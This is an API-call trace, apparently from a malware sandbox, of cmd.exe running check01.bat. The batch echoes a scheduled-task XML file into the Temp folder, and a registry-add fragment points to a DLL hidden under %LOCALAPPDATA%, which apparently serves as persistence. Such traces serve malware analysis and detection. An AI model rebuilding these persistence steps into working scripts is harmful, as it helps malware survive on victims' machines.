[0377.695] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.698] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0377.698] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.699] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x201740, Size=0x62) returned 0x201740
[0377.699] GetProcessHeap () returned 0x200000
[0377.699] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x201740) returned 0x62
[0377.699] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 42
[0377.699] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.699] GetFileType (hFile=0x64) returned 0x1
[0377.700] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.700] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 43
[0377.700] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x2a, lpOverlapped=0x0) returned 1
[0377.703] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0377.706] _close (_FileHandle=3) returned 0
[0377.707] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.707] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.708] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.708] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.708] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.708] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.709] SetConsoleInputExeNameW () returned 0x1
[0377.709] GetConsoleOutputCP () returned 0x1b5
[0377.711] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.711] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.711] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.711] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.712] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.712] SetFilePointer (in: hFile=0x64, lDistanceToMove=481, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e1
[0377.712] GetProcessHeap () returned 0x200000
[0377.712] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2017c0 | out: hHeap=0x200000) returned 1
[0377.712] GetProcessHeap () returned 0x200000
[0377.712] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0377.712] GetProcessHeap () returned 0x200000
[0377.712] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0377.712] GetProcessHeap () returned 0x200000
[0377.713] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc60 | out: hHeap=0x200000) returned 1
[0377.713] GetProcessHeap () returned 0x200000
[0377.713] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0377.713] GetProcessHeap () returned 0x200000
[0377.713] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0377.713] GetProcessHeap () returned 0x200000
[0377.713] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.713] GetProcessHeap () returned 0x200000
[0377.713] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0377.714] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.714] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e1
[0377.714] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xd51, lpOverlapped=0x0) returned 1
[0377.714] SetFilePointer (in: hFile=0x64, lDistanceToMove=590, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x24e
[0377.714] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=109, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 109
[0377.714] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.714] GetFileType (hFile=0x64) returned 0x1
[0377.714] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.715] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x24e
[0377.715] GetProcessHeap () returned 0x200000
[0377.715] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22d3d0
[0377.715] GetProcessHeap () returned 0x200000
[0377.715] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2313f0
[0377.715] GetProcessHeap () returned 0x200000
[0377.715] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0377.715] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0377.715] GetProcessHeap () returned 0x200000
[0377.715] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.715] GetProcessHeap () returned 0x200000
[0377.716] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313f0 | out: hHeap=0x200000) returned 1
[0377.716] GetProcessHeap () returned 0x200000
[0377.716] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22d3d0 | out: hHeap=0x200000) returned 1
[0377.716] _tell (_FileHandle=3) returned 590
[0377.717] _close (_FileHandle=3) returned 0
[0377.717] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0377.717] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0377.717] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0377.717] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0377.717] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0377.717] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0377.717] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0377.717] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0377.717] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0377.718] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0377.718] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.718] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.718] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.718] GetFileType (hFile=0x7) returned 0x2
[0377.719] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0377.719] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0377.720] _dup (_FileHandle=1) returned 3
[0377.721] _close (_FileHandle=1) returned 0
[0377.722] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0377.722] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.722] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0377.722] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.722] GetFileType (hFile=0x64) returned 0x1
[0377.722] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2a
[0377.722] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x29
[0377.723] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0377.723] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.723] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x2017b0, Size=0xb8) returned 0x2017b0
[0377.723] GetProcessHeap () returned 0x200000
[0377.723] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x2017b0) returned 0xb8
[0377.724] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 85
[0377.724] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.724] GetFileType (hFile=0x64) returned 0x1
[0377.724] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.724] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 86
[0377.724] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x55, lpOverlapped=0x0) returned 1
[0377.724] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0377.726] _close (_FileHandle=3) returned 0
[0377.727] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.727] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.728] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.728] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.729] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.729] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.730] SetConsoleInputExeNameW () returned 0x1
[0377.730] GetConsoleOutputCP () returned 0x1b5
[0377.730] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.730] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.731] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.731] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.731] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.731] SetFilePointer (in: hFile=0x64, lDistanceToMove=590, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x24e
[0377.731] GetProcessHeap () returned 0x200000
[0377.731] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201880 | out: hHeap=0x200000) returned 1
[0377.731] GetProcessHeap () returned 0x200000
[0377.732] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2017b0 | out: hHeap=0x200000) returned 1
[0377.732] GetProcessHeap () returned 0x200000
[0377.732] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0377.732] GetProcessHeap () returned 0x200000
[0377.732] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0377.732] GetProcessHeap () returned 0x200000
[0377.732] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0377.732] GetProcessHeap () returned 0x200000
[0377.732] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0377.732] GetProcessHeap () returned 0x200000
[0377.732] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.733] GetProcessHeap () returned 0x200000
[0377.733] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0377.733] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.733] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x24e
[0377.733] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xce4, lpOverlapped=0x0) returned 1
[0377.733] SetFilePointer (in: hFile=0x64, lDistanceToMove=633, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x279
[0377.734] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=43, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nchemas.microsoft.com/windows/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 43
[0377.734] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.734] GetFileType (hFile=0x64) returned 0x1
[0377.734] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.734] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x279
[0377.734] GetProcessHeap () returned 0x200000
[0377.734] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22d3d0
[0377.734] GetProcessHeap () returned 0x200000
[0377.734] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2313f0
[0377.734] GetProcessHeap () returned 0x200000
[0377.735] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0377.735] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0377.735] GetProcessHeap () returned 0x200000
[0377.735] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.735] GetProcessHeap () returned 0x200000
[0377.736] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313f0 | out: hHeap=0x200000) returned 1
[0377.736] GetProcessHeap () returned 0x200000
[0377.736] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22d3d0 | out: hHeap=0x200000) returned 1
[0377.736] _tell (_FileHandle=3) returned 633
[0377.736] _close (_FileHandle=3) returned 0
[0377.737] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0377.737] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0377.737] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0377.737] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0377.737] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0377.737] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0377.737] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0377.737] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0377.737] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0377.737] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0377.737] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.737] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.737] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.737] GetFileType (hFile=0x7) returned 0x2
[0377.738] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0377.738] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0377.739] _dup (_FileHandle=1) returned 3
[0377.740] _close (_FileHandle=1) returned 0
[0377.741] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0377.741] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.741] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0377.741] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.741] GetFileType (hFile=0x64) returned 0x1
[0377.742] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7f
[0377.742] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x7e
[0377.742] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0377.742] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.743] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21cc60, Size=0x38) returned 0x21cc60
[0377.743] GetProcessHeap () returned 0x200000
[0377.743] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21cc60) returned 0x38
[0377.743] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 21
[0377.743] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.743] GetFileType (hFile=0x64) returned 0x1
[0377.743] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.743] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 22
[0377.743] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x15, lpOverlapped=0x0) returned 1
[0377.744] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0377.746] _close (_FileHandle=3) returned 0
[0377.747] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.747] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.748] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.748] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.749] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.749] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.750] SetConsoleInputExeNameW () returned 0x1
[0377.750] GetConsoleOutputCP () returned 0x1b5
[0377.751] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.751] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.751] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.751] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.751] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.752] SetFilePointer (in: hFile=0x64, lDistanceToMove=633, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x279
[0377.752] GetProcessHeap () returned 0x200000
[0377.752] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2286e0 | out: hHeap=0x200000) returned 1
[0377.752] GetProcessHeap () returned 0x200000
[0377.752] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc60 | out: hHeap=0x200000) returned 1
[0377.752] GetProcessHeap () returned 0x200000
[0377.752] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0377.753] GetProcessHeap () returned 0x200000
[0377.753] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0377.753] GetProcessHeap () returned 0x200000
[0377.753] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0377.753] GetProcessHeap () returned 0x200000
[0377.753] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x228690 | out: hHeap=0x200000) returned 1
[0377.753] GetProcessHeap () returned 0x200000
[0377.753] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.753] GetProcessHeap () returned 0x200000
[0377.753] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0377.754] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.754] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x279
[0377.754] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xcb9, lpOverlapped=0x0) returned 1
[0377.754] SetFilePointer (in: hFile=0x64, lDistanceToMove=701, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd
[0377.754] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^2020-06-18T10:13:32.9293139^ >> %temp%\\a.xml\r\n", cbMultiByte=68, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^2020-06-18T10:13:32.9293139^ >> %temp%\\a.xml\r\nows/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 68
[0377.754] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.755] GetFileType (hFile=0x64) returned 0x1
[0377.755] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.755] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd
[0377.755] GetProcessHeap () returned 0x200000
[0377.755] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22d3d0
[0377.755] GetProcessHeap () returned 0x200000
[0377.755] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2313f0
[0377.755] GetProcessHeap () returned 0x200000
[0377.755] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0377.756] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0377.756] GetProcessHeap () returned 0x200000
[0377.756] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.756] GetProcessHeap () returned 0x200000
[0377.756] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313f0 | out: hHeap=0x200000) returned 1
[0377.756] GetProcessHeap () returned 0x200000
[0377.757] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22d3d0 | out: hHeap=0x200000) returned 1
[0377.757] _tell (_FileHandle=3) returned 701
[0377.757] _close (_FileHandle=3) returned 0
[0377.757] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0377.757] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0377.757] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0377.758] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0377.758] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0377.758] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0377.758] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0377.758] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0377.758] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0377.758] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0377.758] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.758] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.758] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.758] GetFileType (hFile=0x7) returned 0x2
[0377.759] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0377.759] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0377.760] _dup (_FileHandle=1) returned 3
[0377.761] _close (_FileHandle=1) returned 0
[0377.762] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0377.762] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.762] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0377.763] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.763] GetFileType (hFile=0x64) returned 0x1
[0377.763] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x94
[0377.763] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x93
